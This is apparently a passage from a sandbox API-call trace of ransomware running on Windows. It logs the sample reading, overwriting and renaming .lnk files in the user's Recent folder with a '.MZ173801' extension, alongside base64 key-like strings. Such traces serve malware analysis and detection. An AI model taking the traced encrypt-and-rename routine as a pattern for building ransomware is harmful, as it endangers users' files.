"c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\atjrrwovtu.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ATjrrwOvtU.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\atjrrwovtu.lnk.mz173801")) returned 1 [0107.118] GetCurrentThreadId () returned 0x1358 [0107.118] GetCurrentThreadId () returned 0x1358 [0107.118] GetCurrentThreadId () returned 0x1358 [0107.118] GetCurrentThreadId () returned 0x1358 [0107.118] GetCurrentThreadId () returned 0x1358 [0107.118] GetCurrentThreadId () returned 0x1358 [0107.118] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf95bd2d, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x67fe51f2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x67fe51f2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="AutomaticDestinations", cAlternateFileName="AUTOMA~1")) returned 1 [0107.118] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb780f46, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeb780f46, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeb780f46, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x3d6, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="axVy7fvJB.lnk", cAlternateFileName="AXVY7F~1.LNK")) returned 1 [0107.118] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0107.118] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0107.118] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\axVy7fvJB.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\axvy7fvjb.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb780f46, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeb780f46, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeb780f46, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x3d6)) returned 1 [0107.119] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0107.119] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0107.119] GetCurrentThreadId () returned 0x1358 [0107.119] GetCurrentThreadId () returned 0x1358 [0107.119] GetCurrentThreadId () returned 0x1358 [0107.119] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0107.120] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0107.120] GetCurrentThreadId () returned 0x1358 [0107.120] GetCurrentThreadId () returned 0x1358 [0107.120] GetCurrentThreadId () returned 0x1358 [0107.120] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\axVy7fvJB.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\axvy7fvjb.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0107.120] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0107.120] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0107.120] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x3d6 [0107.120] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0107.120] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x3d6, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x3d6, lpOverlapped=0x0) returned 1 [0107.121] CloseHandle (hObject=0x3f4) returned 1 [0107.121] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\axVy7fvJB.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\axvy7fvjb.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0107.122] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x3d6, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x3d6, lpOverlapped=0x0) returned 1 [0107.123] CloseHandle (hObject=0x3f4) returned 1 [0107.124] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\axVy7fvJB.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\axvy7fvjb.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\axVy7fvJB.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\axvy7fvjb.lnk.mz173801")) returned 1 [0107.124] GetCurrentThreadId () returned 0x1358 [0107.124] GetCurrentThreadId () returned 0x1358 [0107.124] GetCurrentThreadId () returned 0x1358 [0107.124] GetCurrentThreadId () returned 0x1358 [0107.124] GetCurrentThreadId () returned 0x1358 [0107.124] GetCurrentThreadId () returned 0x1358 [0107.124] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea50696e, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea50696e, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xea50696e, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x441, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="aY06BCEf5o.lnk", cAlternateFileName="AY06BC~1.LNK")) returned 1 [0107.124] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0107.124] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0107.124] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\aY06BCEf5o.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\ay06bcef5o.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea50696e, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea50696e, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xea50696e, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x441)) returned 1 [0107.125] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0107.125] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0107.125] GetCurrentThreadId () returned 0x1358 [0107.125] GetCurrentThreadId () returned 0x1358 [0107.125] GetCurrentThreadId () returned 0x1358 [0107.126] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0107.126] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 